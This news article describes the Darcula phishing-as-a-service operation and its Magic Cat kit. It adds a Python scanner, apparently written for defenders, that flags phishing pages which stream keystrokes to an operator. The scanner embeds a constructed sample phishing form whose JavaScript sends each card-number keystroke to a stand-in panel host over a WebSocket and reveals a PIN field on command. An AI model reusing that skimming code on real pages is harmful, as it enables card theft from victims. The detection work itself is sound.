Darcula Phishing as a Service Operation Snares 800,000+ Victims

Security researchers have lifted the lid on a prolific phishing-as-a-service (PhaaS) operation which victimized hundreds of thousands of people in just a few months.
Darcula is designed to target iPhone and Android users with phishing messages – spoofing brands to trick them into handing over card details, according to Norwegian security firm Mnemonic.
Operating globally, it lures victims into clicking links in SMS, RCS and iMessage texts that impersonate brands such as delivery firms (RCS and iMessage being channels that, unlike plain SMS, carrier-side spam filters cannot inspect). Victims are asked to pay a delivery charge to release their ‘package,’ settle road toll fees and the like, and the payment form harvests their card details.
Previous reports on the operation have highlighted its continued evolution, to include new features like generative AI to create customized smishing campaigns, as well as anti-forensics capabilities.
By reverse engineering the phishing kit itself, Mnemonic identified the “backbone” of the operation: a feature-rich toolkit dubbed “Magic Cat.”
In a joint investigation with Norwegian broadcaster NRK, they were able to trace this package back to a 24-year-old from Henan province in China.
An estimated 600 cybercrime groups use the infrastructure. Most of them coordinate in closed Telegram groups, use SIM farms to send messages at scale and run the stolen card details through card terminals to cash out. Most appear to be native Chinese speakers.
Around 884,000 cards were compromised in this way in just a seven-month period between 2023 and 2024, the researchers claimed.
Exploring Magic Cat
Mnemonic explained that Magic Cat is a feature-rich toolkit developed for non-technical buyers to scale smishing campaigns.
“At the time, this included out-of-the-box support to impersonate a few hundred brands in countries around the world. Recent updates to the platform are reported to have made building custom brand templates even more user friendly for operators,” it said.
“Magic Cat also streamed data entered by victims in real-time to the operators, allowing them to see character-by-character the data that was entered into the phishing sites. It also allows operators to request PIN codes in real-time, integrate easily with SMS gateways, amongst many other features.”
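The two behaviours in that description, streaming each keystroke to the operator and pushing a PIN prompt back to the victim on demand, both leave traces in the phishing page's client-side JavaScript. The scanner below is an added example for defenders, not Mnemonic's tooling or Magic Cat's code: it looks for per-keystroke event handlers that call a network sink, and for inbound message handlers that rewrite the DOM. The two sample pages are constructed for the demo, and the regexes are an assumption about what such kit JavaScript looks like (inline `oninput="..."` attributes, for instance, are not covered).

```python
"""Heuristic scan for real-time keystroke exfiltration and operator-triggered
prompts in a phishing page. Added example; the sample pages are constructed and
the patterns are assumptions, not signatures taken from Magic Cat."""
import re
from dataclasses import dataclass

# Constructed sample: a fake delivery-fee form that forwards every keystroke
# of the card number to an operator panel and reveals a PIN field on command.
SAMPLE_KEYSTROKE_EXFIL = """
<form id="fee">
  <label>Card number <input id="card" name="cardnumber"></label>
  <div id="pin-step" style="display:none"><input id="pin" name="pin"></div>
</form>
<script>
  var ws = new WebSocket("wss://panel.example.invalid/live");
  document.getElementById("card").addEventListener("input", function (e) {
    ws.send(JSON.stringify({f: "card", v: e.target.value}));   // every keystroke
  });
  ws.onmessage = function (ev) {                               // operator asks for PIN
    if (ev.data === "askpin") document.getElementById("pin-step").style.display = "block";
  };
</script>
"""

# Constructed benign page: keystroke handler does local validation only.
SAMPLE_BENIGN = """
<form action="/pay" method="post">
  <input id="card" name="cardnumber">
  <button>Pay</button>
</form>
<script>
  document.getElementById("card").addEventListener("input", function (e) {
    e.target.classList.toggle("bad", e.target.value.length < 13);
  });
</script>
"""

KEYSTROKE_EVENTS = ("input", "keyup", "keydown", "keypress")
LISTENER_RE = re.compile(
    r"addEventListener\s*\(\s*['\"](%s)['\"]" % "|".join(KEYSTROKE_EVENTS))
# Client-side calls that move data off the page.
NETWORK_SINKS = re.compile(
    r"\.send\s*\(|fetch\s*\(|XMLHttpRequest|sendBeacon\s*\(|new\s+Image\s*\(")
# Operator -> victim channel: a message handler on a live connection ...
INBOUND_RE = re.compile(r"\.onmessage\s*=|addEventListener\s*\(\s*['\"]message['\"]")
# ... that changes what the victim sees (a surprise PIN field, a prompt).
DOM_INJECT = re.compile(r"innerHTML|createElement\s*\(|prompt\s*\(|\.style\.display")
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)


@dataclass(frozen=True)
class Finding:
    kind: str   # "keystroke_exfil" or "operator_prompt"
    event: str  # event that triggers the handler
    sink: str   # call or property that made the handler suspicious


def _handler_body(js: str, start: int) -> str:
    """Text of the first {...} block after `start` (brace matching; string
    literals are not parsed, which is good enough for kit-style JS)."""
    open_i = js.find("{", start)
    if open_i < 0:
        return ""
    depth = 0
    for i in range(open_i, len(js)):
        if js[i] == "{":
            depth += 1
        elif js[i] == "}":
            depth -= 1
            if depth == 0:
                return js[open_i:i + 1]
    return js[open_i:]


def scan_page(html: str) -> list[Finding]:
    """Return one Finding per suspicious handler found in the page's scripts."""
    findings = []
    for script in SCRIPT_RE.findall(html):
        for m in LISTENER_RE.finditer(script):
            sink = NETWORK_SINKS.search(_handler_body(script, m.end()))
            if sink:
                findings.append(Finding("keystroke_exfil", m.group(1), sink.group(0).strip()))
        for m in INBOUND_RE.finditer(script):
            inj = DOM_INJECT.search(_handler_body(script, m.end()))
            if inj:
                findings.append(Finding("operator_prompt", "message", inj.group(0).strip()))
    return findings


if __name__ == "__main__":
    for name, page in (("exfil", SAMPLE_KEYSTROKE_EXFIL), ("benign", SAMPLE_BENIGN)):
        print(name, scan_page(page))
```

The benign page also registers an `input` handler, so the event alone is not the signal; it is the pairing of a per-keystroke handler with a network sink (and of an inbound message handler with DOM changes) that distinguishes a live-streaming kit from ordinary form validation. Run against a captured phishing page, a kit that obfuscates its JavaScript will defeat these regexes, so treat the output as a triage hint rather than a verdict.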
Law enforcement authorities in various jurisdictions have been notified.